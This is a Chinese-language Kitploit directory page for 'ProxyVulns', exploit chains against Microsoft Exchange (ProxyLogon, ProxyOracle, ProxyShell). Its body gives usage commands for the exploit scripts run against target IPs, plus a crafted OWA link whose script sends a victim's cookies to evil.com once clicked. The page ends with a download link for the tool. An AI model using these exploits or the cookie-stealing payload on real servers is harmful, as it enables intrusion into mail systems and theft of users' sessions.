Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ProxyVulns — [ProxyLogon] CVE-2021-26855和CVE-2021-27065 RawIdentity漏洞利用修复。 [ProxyOracle] CVE-2021-31195和CVE-2021-31196利用链。 [ProxyShell] CVE-2021-34473、CVE-2021-34523和CVE-2021-31207利用链。 | Kitploit
工具/GitHubGitHub/hosch3n/proxyvulns
漏洞利用框架漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubhosch3n/proxyvulns

ProxyVulns

[ProxyLogon] CVE-2021-26855和CVE-2021-27065 RawIdentity漏洞利用修复。 [ProxyOracle] CVE-2021-31195和CVE-2021-31196利用链。 [ProxyShell] CVE-2021-34473、CVE-2021-34523和CVE-2021-31207利用链。

查看仓库
1773313年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ProxyVulns

ProxyLogon

Usage: python3 26855.py 1.1.1.1

ProxyOracle

root@kitploit:~
Once a victim clicks this link, evil.com will receive the cookies.

https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`[email protected]:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/any.skin`,{credentials:`include`});//
root@kitploit:~
pip3 install pycryptodome

Usage: python3 31196.py 1.1.1.1 'cadata=xxx; cadataTTL=yyy; ...'

ProxyShell

root@kitploit:~
pip3 install pypsrp

Usage: python3 34473.py 1.1.1.1

Usage: python3 31207.py 1.1.1.1 [Local File Path] [UNC Absolute Path]

在某些版本的目标上无法正常工作(由于 /@gmail.com 路径),后续可能会修复

其他

  • Cookie: securitytoken=foobar

  • /owa/calendar/[email protected]/foobar/owa14.aspx/.js

参考

ProxyLogon 漏洞分析(中文)

https://docs.microsoft.com/en-us/exchange/architecture/mailbox-servers/recreate-arbitration-mailboxes?view=exchserver-2019

ProxyOracle 漏洞分析(中文)

https://github.com/mwielgoszewski/python-paddingoracle

ProxyShell 漏洞分析(中文)

下载工具